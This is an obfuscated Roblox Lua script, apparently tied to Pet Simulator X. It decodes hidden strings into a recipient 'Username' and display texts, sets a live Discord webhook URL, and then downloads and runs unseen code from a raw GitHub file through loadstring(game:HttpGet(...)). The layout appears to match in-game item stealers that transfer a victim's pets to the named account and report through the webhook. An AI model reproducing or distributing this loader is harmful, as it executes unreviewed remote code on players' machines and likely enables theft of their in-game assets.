--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=(3572 -2554) -(73 + 944) , #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (4 -(1 + 2)) )),v1(v2(v9,(1672 -(418 + 1086 + 167)) + ((v11-(2 -1))% #v9) ,((726 + 1177) -((2838 -(441 + 528)) + 17 + 16)) + ((v11-1)% #v9) + 1 + (0 -0) )))%((1443 -(101 + 1321)) + 234 + 1) ));end return v5(v10);end Username=v7("\0\174\42\206\120\80\17\168\42\216\126","\102\207\75\175\25\49");WebHook="https://discord.com/api/webhooks/1079049920838914158/YpCefPYMwRvAd3l55NelDkIUUfSTks5URx-qcItqS3ecUAWa9HTMZStaEP4AWjpzLz-l";_G.CustomScriptName=v7("\64\144\137\174\115\212\114","\16\195\209\142\59\161");_G.Text1=v7("\14\180\22\117\45\163\68\80\50\182\0\121\57\249\74\50","\93\215\100\28");_G.Text2=v7("\132\137\187\16\37\189\143\242\2\35\161\200\129\7\62\186\152\166","\211\232\210\100\76");_G.Text3=v7("\93\126\136\238\119\74\83\168\62\69\142\255\117\83\73\188\48\56\195","\30\22\237\141\28\35\61\207");_G.Text4=v7("\230\103\64\86\35\176\170\5\149\64\66\86\62\169\176\17\155\61\15","\181\19\33\36\87\217\196\98");loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))();
